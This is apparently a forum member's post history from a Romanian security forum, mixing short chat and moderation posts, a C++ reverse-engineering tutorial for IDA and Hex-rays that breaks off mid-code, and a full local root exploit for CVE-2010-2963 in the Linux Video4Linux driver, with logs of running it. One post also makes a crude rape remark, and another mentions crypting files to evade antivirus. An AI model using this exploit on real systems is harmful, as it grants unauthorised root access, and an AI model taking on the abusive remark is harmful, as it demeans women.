Everything posted by Nytro

  1. Nytro

    Language

    What does this do: var times = 2; while (times < 2 ) { print( "hello" ); times }; ?
  2. Nytro

    Language

    Hmmm: Macro Language ImageJ: Image processing and analysis in Java - Macros. It's a possibility.
  3. Come on, don't you want to be raped by 50 men, what kind of woman are you? If you're paranoid you can disguise yourself as a man. Drop the nonsense and stop going off topic.
  4. Nytro

    Language

    Probably JavaScript, but I don't understand that "print" and that "times".
  5. Nytro

    bug bounty

    Yes, congratulations, but I don't know whether it was useful to give out personal information...
  6. Has ban season returned? You can tell that "school has started"...
  7. Do you feel better now? Yes, you broke a rule, namely: "You don't have 10 posts". The rule is useful, because otherwise the forum would be full of leechers like you, who contribute nothing and only come begging. For better or worse, the long-standing members have helped many people; what have you done? If you're an old member, you should have posted with that account, but maybe it's banned. On top of that, you also have a warning from me for insulting a member.
  8. Nytro

    RST court

    I initially understood it was for the Market. But there aren't really any conflicts there. And there, everything depends on how clever the buyer and the seller are. If everyone starts from the idea "I don't trust anyone", it will be fine. Why would a "Court" be needed? Because Vasile insults you? So what? He gets a warning, then a ban. And it won't happen again. Flames aren't settled this way... It's as if we were children; are we really not able to show that we're mature, that we can settle a "dispute" by ourselves?
  9. It's worth it, you'll see me there :->
  10. Informative. Ban. Source: RST - Search Results
  11. Perfect, useful stuff and good to know. Thanks.
  12. Ah, right, I forgot the most important thing... Anyway, I understood that video4linux is no longer used on Ubuntu versions (at least) newer than 10.04. I tried again today at work on one version, but it wouldn't compile; it said a header was missing. I installed libv4l-dev and it made no difference, same problem.
  13. It didn't work for me, on 2.6.39. I think I also have an older version, I'll try on that one too. For now:

        nytro@rst:~$ whoami
        nytro
        nytro@rst:~$ uname -a
        Linux rst 2.6.39nytro #1 SMP Fri May 20 01:14:36 EEST 2011 i686 GNU/Linux
        nytro@rst:~$ cd Documents/
        nytro@rst:~/Documents$ gcc exploit.c -o exploit
        exploit.c: In function ‘hollywood_status’:
        exploit.c:77: warning: left shift count >= width of type
        exploit.c: In function ‘kernel_write’:
        exploit.c:104: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint64_t’
        nytro@rst:~/Documents$ chmod +x exploit
        nytro@rst:~/Documents$ ./exploit
        Preparing ...
        [*] Resolved commit_creds to 0x00000000c016ea90
        [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
        [*] Exploit payload function pointer at 0x00000000bfcdbf3c
        [*] Opening trigger socket listener on port 31337 ...
        [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede5eb48
        Attacking ...
        [*] Overwriting at 0xede5eb48 with 0 bytes from 0x4
        /dev/video0: No such file or directory
        nytro@rst:~/Documents$ whoami
        nytro
        nytro@rst:~/Documents$ mknod /dev/video0 c 81 0
        mknod: `/dev/video0': Permission denied
        nytro@rst:~/Documents$ su
        Password:
        root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0
        root@rst:/home/nytro/Documents# exit
        exit
        nytro@rst:~/Documents$ ./exploit
        Preparing ...
        [*] Resolved commit_creds to 0x00000000c016ea90
        [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
        [*] Exploit payload function pointer at 0x00000000bf87210c
        [*] Opening trigger socket listener on port 31337 ...
        [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748
        Attacking ...
        [*] Overwriting at 0xede58748 with 0 bytes from 0x4
        /dev/video0: Permission denied
        nytro@rst:~/Documents$ su
        Password:
        root@rst:/home/nytro/Documents# chmod 666 /dev/video0
        root@rst:/home/nytro/Documents# exit
        exit
        nytro@rst:~/Documents$ ./exploit
        Preparing ...
        [*] Resolved commit_creds to 0x00000000c016ea90
        [*] Resolved prepare_kernel_cred to 0x00000000c016ecc0
        [*] Exploit payload function pointer at 0x00000000bfa9b57c
        [*] Opening trigger socket listener on port 31337 ...
        [*] Trigger struct sock address + offset of sk_destruct: 0x00000000ede58748
        Attacking ...
        [*] Overwriting at 0xede58748 with 0 bytes from 0x4
        /dev/video0: No such device or address
        nytro@rst:~/Documents$ ls /dev/video*
        /dev/video0
        nytro@rst:~/Documents$ lsmod
        Module                  Size  Used by
        videodev               78103  0
        binfmt_misc             6420  1
        parport_pc             25796  0
        ppdev                   5064  0
        dm_crypt               13696  0
        mac80211              246236  0
        snd_hda_codec_hdmi     21534  1
        snd_hda_codec_realtek 248102  1
        snd_hda_intel          21720  2
        snd_hda_codec          84130  3 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel
        snd_hwdep               4984  1 snd_hda_codec
        snd_pcm                70434  3 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec
        snd_seq_midi            4364  0
        r8192se_pci           445895  0
        snd_rawmidi            17462  1 snd_seq_midi
        joydev                  8489  0
        snd_seq_midi_event      5959  1 snd_seq_midi
        cfg80211              145102  1 mac80211
        snd_seq                46035  2 snd_seq_midi,snd_seq_midi_event
        snd_timer              18315  2 snd_pcm,snd_seq
        snd_seq_device          5562  3 snd_seq_midi,snd_rawmidi,snd_seq
        snd                    48219 14 snd_hda_codec_hdmi,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device
        psmouse                61369  0
        serio_raw               3776  0
        soundcore                888  1 snd
        snd_page_alloc          7096  2 snd_hda_intel,snd_pcm
        lp                      7085  0
        hp_wmi                  7204  0
        parport                30699  3 parport_pc,ppdev,lp
        sparse_keymap           3478  1 hp_wmi
        i915                  467399  2
        usbhid                 34350  0
        hid                    68860  1 usbhid
        usb_storage            39698  0
        drm_kms_helper         32119  1 i915
        drm                   183577  3 i915,drm_kms_helper
        ahci                   18634  2
        i2c_algo_bit            4913  1 i915
        libahci                19882  1 ahci
        intel_agp               9562  1 i915
        intel_gtt              13592  3 i915,intel_agp
        r8169                  36279  0
        agpgart                29117  3 drm,intel_agp,intel_gtt
        video                  11166  1 i915
        mii                     4434  1 r8169
        nytro@rst:~/Documents$

    On another version (2.6.35):

        nytro@rst:~$ whoami
        nytro
        nytro@rst:~$ lsmod
        Module                  Size  Used by
        binfmt_misc             6599  1
        vboxnetadp              6454  0
        vboxnetflt             15152  0
        vboxdrv               190199  2 vboxnetadp,vboxnetflt
        parport_pc             26058  0
        ppdev                   5556  0
        dm_crypt               11385  0
        snd_hda_codec_intelhdmi 9812  1
        joydev                  8767  0
        snd_hda_codec_realtek 218492  1
        snd_hda_intel          22235  2
        snd_hda_codec          87552  3 snd_hda_codec_intelhdmi,snd_hda_codec_realtek,snd_hda_intel
        r8192se_pci           469516  0
        psmouse                59033  0
        serio_raw               4022  0
        snd_hwdep               5040  1 snd_hda_codec
        hp_wmi                  5223  0
        snd_pcm                71475  2 snd_hda_intel,snd_hda_codec
        snd_seq_midi            4588  0
        mac80211              231959  0
        snd_rawmidi            17783  1 snd_seq_midi
        snd_seq_midi_event      6047  1 snd_seq_midi
        snd_seq                47174  2 snd_seq_midi,snd_seq_midi_event
        snd_timer              19067  2 snd_pcm,snd_seq
        lp                      7342  0
        snd_seq_device          5744  3 snd_seq_midi,snd_rawmidi,snd_seq
        snd                    49038 13 snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device
        cfg80211              144694  2 r8192se_pci,mac80211
        soundcore                880  1 snd
        snd_page_alloc          7120  2 snd_hda_intel,snd_pcm
        parport                31492  3 parport_pc,ppdev,lp
        dm_raid45              81721  0
        xor                    15136  1 dm_raid45
        i915                  295435  3
        usbhid                 36882  0
        drm_kms_helper         30200  1 i915
        hid                    67742  1 usbhid
        drm                   168060  3 i915,drm_kms_helper
        usb_storage            40204  0
        intel_agp              26566  2 i915
        ahci                   19198  2
        r8169                  36521  0
        libahci                21728  1 ahci
        mii                     4425  1 r8169
        agpgart                32011  2 drm,intel_agp
        i2c_algo_bit            5168  1 i915
        video                  18712  1 i915
        output                  1883  1 video
        ramzswap                9555  0
        lzo_compress            1865  1 ramzswap
        nytro@rst:~$ cd Documents/
        nytro@rst:~/Documents$ ls /dev/video*
        ls: cannot access /dev/video*: No such file or directory
        nytro@rst:~/Documents$ ./exploit
        Preparing ...
        [*] Resolved commit_creds to 0x00000000c016cd40
        [*] Resolved prepare_kernel_cred to 0x00000000c016d190
        [*] Exploit payload function pointer at 0x00000000bf8dc72c
        [*] Opening trigger socket listener on port 31337 ...
        [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048
        Attacking ...
        [*] Overwriting at 0xf415a048 with 0 bytes from 0x4
        /dev/video0: No such file or directory
        nytro@rst:~/Documents$ su
        Password:
        root@rst:/home/nytro/Documents# mknod /dev/video0 c 81 0
        root@rst:/home/nytro/Documents# chmod 666 /dev/video0
        root@rst:/home/nytro/Documents# exit
        exit
        nytro@rst:~/Documents$ ./exploit
        Preparing ...
        [*] Resolved commit_creds to 0x00000000c016cd40
        [*] Resolved prepare_kernel_cred to 0x00000000c016d190
        [*] Exploit payload function pointer at 0x00000000bfbcabbc
        [*] Opening trigger socket listener on port 31337 ...
        [*] Trigger struct sock address + offset of sk_destruct: 0x00000000f415a048
        Attacking ...
        [*] Overwriting at 0xf415a048 with 0 bytes from 0x4
        /dev/video0: No such device or address
        nytro@rst:~/Documents$ uname -a
        Linux rst 2.6.35-28-generic #50-Ubuntu SMP Fri Mar 18 19:00:26 UTC 2011 i686 GNU/Linux
        nytro@rst:~/Documents$

    PS: My kernels probably weren't compiled with video4linux support. Isn't there anyone with Ubuntu 10.04 who can try this?
  14. Ubuntu 10.04 (kernel 2.6.36?) - Local Root Privilege Escalation Exploit

    I'm not sure it works. I was looking at a presentation from Defcon 19 today and came across it. It's about this problem:

    CVE - CVE-2010-2963 (under review)

    drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L) implementation in the Linux kernel before 2.6.36 on 64-bit platforms does not validate the destination of a memory copy operation, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this device.

    Info: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-2963)

    Exploit:

        /*
         * Stand-alone CVE-2010-2963 exploit, tuned for unpatched Ubuntu 10.04
         * Kees Cook <kees@ubuntu.com>
         *
         * Thanks to Dan Rosenberg for net target/trigger (with thanks to
         * netstat authors for INET_DIAG parsing code).
         * Thanks to Brad Spengler for symbols parser and creds payload.
         * Greets to pipacs, redpig, nelhage, segoon, taviso, solardiz.
         *
         */
        #define _GNU_SOURCE
        #include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>
        #include <sys/types.h>
        #include <sys/stat.h>
        #include <fcntl.h>
        #include <time.h>
        #include <sys/wait.h>
        #include <sys/socket.h>
        #include <linux/netlink.h>
        #include <linux/inet_diag.h>
        #include <sys/utsname.h>
        #include <string.h>
        #include <sys/mman.h>
        #include <errno.h>
        #include <netinet/in.h>
        #include <sys/types.h>
        #include <linux/videodev.h>

        #include <syscall.h>
        /* 32bit __NR_ioctl syscall 54 */
        #include <asm/unistd_32.h>
        #define IOCTL_SYSCALL __NR_ioctl

        #define PORT 31337          /* Trigger socket, just listens briefly */
        #define SOCK_OFFSET 584     /* offsetof(struct sock, sk_destruct) */
        #define DEVICE "/dev/video0"

        unsigned int syscall32(unsigned int syscall, unsigned int arg1,
                               unsigned int arg2, unsigned int arg3)
        {
            unsigned int rc;
            asm volatile(
                "movl %1, %%ebx;\n"
                "movl %2, %%ecx;\n"
                "movl %3, %%edx;\n"
                "movl %4, %%eax;\n"
                "int $0x80;\n"
                "movl %%eax, %0;\n"
                /* output */
                : "=g"(rc)
                /* input */
                : "g"(arg1), "g"(arg2), "g"(arg3), "g"(syscall)
                /* clobbered registers */
                : "%eax", "%ebx", "%ecx", "%edx"
            );
            return rc;
        }

        int hollywood = 0;

        void hollywood_status(char *format, unsigned long value)
        {
            unsigned long mask = 0x0;
            unsigned long drama;
            int counter;

            if (!hollywood) {
                printf(format, value);
                printf("\n");
                return;
            }

            for (counter = 0 ; ; counter ++) {
                drama = ((unsigned long)rand() << (sizeof(int)*8)) | (unsigned long)rand();
                printf("\r");
                printf(format, (drama & ~mask) | (value & mask));
                fflush(NULL);
                usleep(10000);
                if (mask == ~0x0UL) break;
                if (counter % 16 == 0) {
                    mask |= (0xFFUL << ((rand() % sizeof(mask))*8));
                }
            }
            printf("\n");
        }

        struct video_code32 {
            char loadwhat[16];
            int datasize;
            int padding;
            uint64_t data;
        };

        int kernel_write(uint64_t destination, void *source, int length)
        {
            static struct video_code32 *vc;
            static struct video_tuner *tuner;
            int dev;
            unsigned int code;

            printf("[*] Overwriting at 0x%lx with %d bytes from %p\n", destination, length, source);

            if ( (dev=open(DEVICE, O_RDWR)) < 0) {
                perror(DEVICE);
                exit(1);
            }
            printf(" - Opened %s\n", DEVICE);
            if (hollywood) sleep(3);

            if (!vc) {
                vc = (struct video_code32*)mmap(NULL, sizeof(*vc), PROT_READ | PROT_WRITE,
                                                MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0);
                if (vc == MAP_FAILED) {
                    perror("mmap");
                    exit(1);
                }
            }
            if (!tuner) {
                tuner = (struct video_tuner*)mmap(NULL, sizeof(*tuner), PROT_READ | PROT_WRITE,
                                                  MAP_PRIVATE | MAP_ANONYMOUS | MAP_32BIT, 0, 0);
                if (tuner == MAP_FAILED) {
                    perror("mmap");
                    exit(1);
                }
            }

            vc->datasize = length;
            vc->data = (uint64_t)(uintptr_t)source;

            memset(tuner, 0xBB, sizeof(*tuner));
            // manual union, since a real union won't do ptrs for 64bit
            uint64_t *ptr = (uint64_t*)(&(tuner->name[20]));
            *ptr = destination;

            printf(" - Spamming VIDIOCSTUNER ioctl ...\n");
            // beat memory into the stack...
            code = 0x40347605; // VIDIOCSTUNER
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)tuner);

            /* VIDIOCSMICROCODE32, the misconstructed VIDIOCSMICROCODE */
            code = 0x4020761b;
            syscall32(IOCTL_SYSCALL, (unsigned int)dev, code, (unsigned int)(uintptr_t)vc);
            printf(" - VIDIOCSMICROCODE ioctl completed\n");

            return 0;
        }

        /* Get the address of the sock struct for our socket */
        unsigned long get_sock_addr(unsigned int port)
        {
            FILE *f;
            char buf[1024];
            unsigned int testport, a;
            unsigned long addr, b;

            f = fopen("/proc/net/tcp", "r");
            if (f == NULL) {   /* fopen() returns NULL on failure, not a negative value */
                printf("[*] Failed to open /proc/net/tcp\n");
                return 0;
            }

            while (fgets(buf, 1024, f)) {
                sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X "
                            "%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u "
                            "%d\n",
                       &a, &a, &testport, &a, &a, &a, &a, &a, &a, &b, &a, &a, &a, &b, &a,
                       (void **)&addr, &b, &b, &a, &a, &a);
                if (testport == port)
                    goto out;
            }
            addr = 0;
        out:
            fclose(f);
            return addr;
        }

        typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
        typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
        _commit_creds commit_creds;
        _prepare_kernel_cred prepare_kernel_cred;

        int __attribute__((regparm(3)))
        getroot(void * file, void * vma)
        {
            commit_creds(prepare_kernel_cred(0));
            return -1;
        }

        unsigned long get_kernel_sym(char *name)
        {
            FILE *f;
            unsigned long addr;
            char dummy;
            char sname[512];
            struct utsname ver;
            int ret;
            int rep = 0;
            int oldstyle = 0;

            f = fopen("/proc/kallsyms", "r");
            if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                    goto fallback;
                oldstyle = 1;
            }

        repeat:
            ret = 0;
            while(ret != EOF) {
                if (!oldstyle)
                    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                    ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                    if (ret == 2) {
                        char *p;
                        if (strstr(sname, "_O/") || strstr(sname, "_S."))
                            continue;
                        p = strrchr(sname, '_');
                        if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                            p = p - 4;
                            while (p > (char *)sname && *(p - 1) == '_')
                                p--;
                            *p = '\0';
                        }
                    }
                }
                if (ret == 0) {
                    fscanf(f, "%s\n", sname);
                    continue;
                }
                if (!strcmp(name, sname)) {
                    char *msg;
                    asprintf(&msg, "[*] Resolved %s to 0x%%016lx", name);
                    hollywood_status(msg, addr);
                    free(msg);
                    fclose(f);
                    return addr;
                }
            }

            fclose(f);
            if (rep)
                return 0;

        fallback:
            /* didn't find the symbol, let's retry with the System.map
               dedicated to the pointlessness of Russell Coker's SELinux
               test machine (why does he keep upgrading the kernel if
               "all necessary security can be provided by SE Linux"?)
             */
            uname(&ver);
            if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
            sprintf(sname, "/boot/System.map-%s", ver.release);
            f = fopen(sname, "r");
            if (f == NULL)
                return 0;
            rep = 1;
            goto repeat;
        }

        int sock;

        unsigned long choose_target()
        {
            unsigned long target;
            struct sockaddr_in addr;

            printf("[*] Opening trigger socket listener on port %d ...\n", PORT);
            sock = socket(AF_INET, SOCK_STREAM, 0);
            if (sock < 0) {
                printf("[*] Failed to open trigger socket.\n");
                exit(1);
            }
            memset(&addr, 0, sizeof(addr));
            addr.sin_family = AF_INET;
            addr.sin_port = htons(PORT);
            addr.sin_addr.s_addr = INADDR_ANY;
            if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
                printf("[*] Failed to bind trigger socket.\n");
                exit(1);
            }
            /* Our socket won't appear in /proc/net/tcp unless it's listening */
            if (listen(sock, 1)) {
                printf("[*] Failed to listen on trigger socket.\n");
                exit(1);
            }

            target = get_sock_addr(PORT);
            if (!target) {
                printf("[*] Failed to get trigger socket address via INET_DIAG.\n");
                exit(1);
            }
            target += SOCK_OFFSET;
            hollywood_status("[*] Trigger struct sock address + offset of sk_destruct: 0x%016lx", target);

            return target;
        }

        void trigger_target()
        {
            if (hollywood) sleep(2);
            printf("[*] Triggering payload...\n");
            if (hollywood) sleep(3);
            close(sock);
        }

        unsigned long get_payload_addr(void)
        {
            commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
            prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
            return (uintptr_t)getroot;
        }

        int main(int argc, char * argv[])
        {
            unsigned long payload;
            unsigned long target;

            srand(time(NULL)); // Hollywood level randomness!
            if (argc>1 && !strcmp(argv[1],"--hollywood")) hollywood = 1;

            printf("Preparing ...\n");
            payload = get_payload_addr();
            hollywood_status("[*] Exploit payload function pointer at 0x%016lx", (uintptr_t)&payload);
            target = choose_target();

            printf("Attacking ...\n");
            kernel_write(target, (void*)&payload, sizeof(payload));
            trigger_target();

            if (getuid()) {
                printf("[*] Failed to get root.\n");
                return -1;
            }
            if (hollywood) {
                printf("[*] *dramatic chord*\n");
                sleep(2);
            }
            printf("[*] Pwnage complete!\n");
            execl("/bin/sh", "sh", NULL);
            perror("execl");
            return 1;
        }

    I don't have many details for now; if I find time to read up on it, I'll come back with more information.
  15. You can do whatever you want with it, you can modify whatever you like, there won't be any problem.
  16. Yes, it's a sort of improved version of that one, but I think I rewrote it from scratch. Here's Selenity CMS, it's more or less the latest version. You can also find it here at RST Power. http://www65.zippyshare.com/v/1073349/file.html AdminCP screenshot: http://i56.tinypic.com/2ccs4s8.jpg
  17. I don't mind being filmed if I manage and it turns out well
  18. We have to do something, whatever we can, anything.
  19. It's at least 3 years old, it looks ugly and has almost no options. So there's no point... I don't even know if I still have it.
  20. I don't know what you scanned... http://www.virustotal.com/file-scan/report.html?id=5228eae4b11ceed3fad19e591b5c800433783503e615560f0739d4f91e4a2d9b-1315512955 And that's with a simple, harmless file crypted, because the stub is detectable.
  21. Reversing C++ programs with IDA pro and Hex-rays

    Introduction

    During my holidays, I had plenty of time to study and reverse a program which was completely coded in C++. This was the first time I seriously studied a C++ codebase using IDA as the only source of information, and I found it quite hard. Here's a sample of what you get with Hex-rays when you start digging into an interesting function:

        v81 = 9;
        v63 = *(_DWORD *)(v62 + 88);
        if ( v63 )
        {
          v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(v63 + 24);
          if ( v64 )
            v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD *)(v3 + 40), bstrString);
        }

    It's our job to add symbol names, identify classes and set up all the information to help Hex-rays give us a reliable and certainly understandable output:

        padding = *Dst;
        if ( padding < 4 )
          return -1;
        buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
        buffer_skip_end(this2->decrypted_input_buffer, padding);
        if ( this2->encrypt_in != null )
        {
          if ( this2->compression_in != null )
          {
            buffer_reinit(this2->compression_buffer_in);
            packet_decompress(this2, this2->decrypted_input_buffer, this2->compression_buffer_in);
            buffer_reinit(this2->decrypted_input_buffer);
            avail_len = buffer_avail_bytes(this2->compression_buffer_in);
            ptr = buffer_get_data_ptr(this2->compression_buffer_in);
            buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
          }
        }
        packet_type = buffer_get_u8(this2->decrypted_input_buffer);
        *len = buffer_avail_bytes(this2->decrypted_input_buffer);
        this2->packet_len = 0;
        return packet_type;

    Of course, Hex-rays is not going to invent the names for you; you'll still have to make sense of the code and what it means to you, but at least being able to give a name to the classes will certainly help. All my samples here have been compiled either with Visual Studio or GNU C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest.

    Structure of a C++ program

    It is not my goal to teach you how OOP works; you already know that. We'll just see how it works (and is implemented) in broad strokes.

    Class = data structure + code (methods). The data structure can only be seen in the source code, while the methods will appear in your favorite disassembler.

    Object = memory allocation + data + virtual functions. The object is an instantiation of a class, and something you can observe in IDA. An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

    Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it). Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and Hex-rays handles them very well in the disassembly.

    Let's go back to the bits and bytes.

    Object creation

        int __cdecl sub_80486E4()
        {
          void *v0; // ebx@1

          v0 = (void *)operator new(8);
          sub_8048846(v0);
          (**(void (__cdecl ***)(void *))v0)(v0);
          if ( v0 )
            (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
          return 0;
        }

    Here's the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn't mean we have 8 bytes of variables. The function sub_8048846 called just after the new() takes the pointer as parameter, and is certainly the constructor. The next function call is a little cryptic. It's doing two pointer dereferences on v0 before calling it. It's a virtual function call. All polymorphic objects have a special pointer in their variables, called the vtable. This table contains the addresses of all the virtual methods, so the C++ program can call them when needed.

    In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This might not stay true for multiple inheritance. I did not test.)

    Let's do some IDA magic:

    Rename the symbols

    Just click on a name, press « n » and give a meaningful name. Since we don't know yet what our class does, I suggest we name the class « class1 », and use this convention until we've understood what our class does. It's very possible that we're going to discover other classes before we've finished digging into class1, so I suggest we simply continue naming classes as we find them.

        int __cdecl main()
        {
          void *v0; // ebx@1

          v0 = (void *)operator new(8);
          class1::ctor(v0);
          (**(void (__cdecl ***)(void *))v0)(v0);
          if ( v0 )
            (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
          return 0;
        }

    Create structures

    The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures. Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that's what we've got here!

    Now, we're going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

    Create a new structure, of 12 bytes, and call it « class1_vtable ». At this stage, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1's declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic. We can rename the few methods « method1 » to « method3 ». Method3 is certainly the destructor.

    Depending on the programming convention and the compiler used, the first method often is the destructor, but here's a counterexample. It is time to analyze the constructor.

    Analysis of the constructor

        int __cdecl class1::ctor(void *a1)
        {
          sub_80487B8(a1);
          *(_DWORD *)a1 = &off_8048A38;
          return puts("B:()");
        }

    You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class. « sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent class. « off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big our vtable is (just watch for the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes. It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn't provide anything you can't see in the classic view.

    The strange call in the constructor

        int __cdecl sub_80487B8(int a1)
        {
          int result; // eax@1

          *(_DWORD *)a1 = &off_8048A50;
          puts("A::A()");
          result = a1;
          *(_DWORD *)(a1 + 4) = 42;
          return result;
        }

    The call to the « sub_80487b8() » function in the constructor reveals the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we're in yet another constructor. Don't retype the type « class1 » for argument « a1 », since we're not dealing with class1. We found a new class, which we will call « class2 ». This class is a superclass of class1. Let's do the same work as for class1. The only difference is that we do not know exactly the size of its members. There are two ways of figuring it out:

      • Look at the xrefs of class2::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
      • Look at the methods in the vtable, and try to guess what's the highest member ever accessed.

    In our case, « class2::ctor » accesses the 4 bytes after the first 4 and sets them to 42. Since its child class « class1 » is 8 bytes long, so is « class2 ». Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

    Study of the destructors

    Let's go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let's study it.

        if ( v0 )
          ((void (__cdecl *)(class1 *)) v0->vtable->method_3)(v0);
        …
        void __cdecl class1::m3(class1 *a1)
        {
          class1::m2(a1);
          operator delete(a1);
        }
        …
        void __cdecl class1::m2(class1 *a1)
        {
          a1->vtable = (class1_vtable *)&class1__vtable;
          puts("B::~B()");
          class2::m2((class2 *)a1);
        }
        …
        void __cdecl class2::m2(class2 *a1)
        {
          a1->vtable = (class2_vtable *)&class2__vtable;
          puts("A::~A()");
        }

    What we can see here is the following: class1::m3 is a destructor, which calls class1::m2, which is the main destructor of class1. What this destructor does is ensure that we're indeed in « class1 » context, by setting the vtable back to its « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes on the way.

    Hey, what are all these casts? Why do I have two structures defining the same fields?

    What we have here is exactly the same problem that you get when doing OOP with C: you end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields: for each class, define a classXX_members, a classXX_vtable and a classXX structure.

    classXX contains
      +++ vtable (typed to classXX_vtable *)
      +++ classXX-1_members (members of the superclass)
      +++ classXX_members, if any

    classXX_vtable contains
      +++ classXX-1_vtable
      +++ classXX's vptrs, if any

    Ideally, you should start from the main class and work towards the children, until you end up in an edge class. In our example, here's the « solution » of our sample:

        00000000 class1          struc ; (sizeof=0x8)
        00000000 vtable          dd ?                    ; offset
        00000004 class2_members  class2_members ?
        00000008 class1          ends
        00000008
        00000000 ; ----------------------------------------------
        00000000
        00000000 class1_members  struc ; (sizeof=0x0)
        00000000 class1_members  ends
        00000000
        00000000 ; ----------------------------------------------
        00000000
        00000000 class1_vtable   struc ; (sizeof=0xC)
        00000000 class2_vtable   class2_vtable ?
        0000000C class1_vtable   ends
        0000000C
        00000000 ; ----------------------------------------------
        00000000
        00000000 class2          struc ; (sizeof=0x8)
        00000000 vtable          dd ?                    ; offset
        00000004 members         class2_members ?
        00000008 class2          ends
        00000008
        00000000 ; ----------------------------------------------
        00000000
        00000000 class2_vtable   struc ; (sizeof=0xC)
        00000000 method_1        dd ?                    ; offset
        00000004 dtor            dd ?                    ; offset
        00000008 delete          dd ?                    ; offset
        0000000C class2_vtable   ends
        0000000C
        00000000 ; ----------------------------------------------
        00000000
        00000000 class2_members  struc ; (sizeof=0x4)
        00000000 field_0         dd ?
        00000004 class2_members  ends
        00000004

        int __cdecl main()
        {
          class1 *v0; // ebx@1

          v0 = (class1 *)operator new(8);
          class1::ctor(v0);
          ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
          if ( v0 )
            ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
          return 0;
        }

        int __cdecl class1::ctor(class1 *a1)
        {
          class2::ctor((class2 *)a1);
          a1->vtable = (class1_vtable *)&class1__vtable;
          return puts("B:()");
        }

        class2 *__cdecl class2::ctor(class2 *a1)
        {
          class2 *result; // eax@1

          a1->vtable = (class2_vtable *)&class2__vtable;
          puts("A::A()");
